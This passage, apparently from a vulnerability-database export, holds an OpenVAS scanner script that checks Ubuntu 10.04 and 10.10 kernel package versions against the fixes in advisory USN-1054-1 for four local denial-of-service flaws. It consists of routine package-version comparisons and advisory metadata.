LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4165", "CVE-2010-0435", "CVE-2010-4169", "CVE-2010-4249"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1054-1", "modified": "2019-03-13T00:00:00", "published": "2011-02-04T00:00:00", "id": "OPENVAS:1361412562310840579", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840579", "type": "openvas", "title": "Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1054_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1054-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840579\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-04 14:19:53 +0100 (Fri, 04 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1054-1\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1054-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1054-1\");\n script_tag(name:\"affected\", value:\"linux, linux-ec2 vulnerabilities on Ubuntu 10.04 LTS,\n Ubuntu 10.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Gleb Napatov discovered that KVM did not correctly check certain\n privileged operations. A local attacker with access to a guest kernel\n could exploit this to crash the host system, leading to a denial of\n service. (CVE-2010-0435)\n\n Steve Chen discovered that setsockopt did not correctly check MSS values.\n A local attacker could make a specially crafted socket call to crash\n the system, leading to a denial of service. (CVE-2010-4165)\n\n Dave Jones discovered that the mprotect system call did not correctly\n handle merged VMAs. A local attacker could exploit this to crash the\n system, leading to a denial of service. (CVE-2010-4169)\n\n Vegard Nossum discovered that memory garbage collection was not\n handled correctly for active sockets. A local attacker could exploit\n this to allocate all available kernel memory, leading to a denial of\n service. (CVE-2010-4249)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-generic\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25-virtual\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic-pae\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-generic\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-25-virtual\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1025.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-25\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-25\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-generic-pae-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-25-virtual-di\", ver:\"2.6.35-25.44\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-312-ec2\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-312-ec2\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-386\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-generic-pae\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28-generic\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-386\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-generic-pae\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-generic\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-28-virtual\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.32-28\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.32\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-312\", ver:\"2.6.32-312.24\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.32-28\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.32\", ver:\"2.6.32-28.55\", 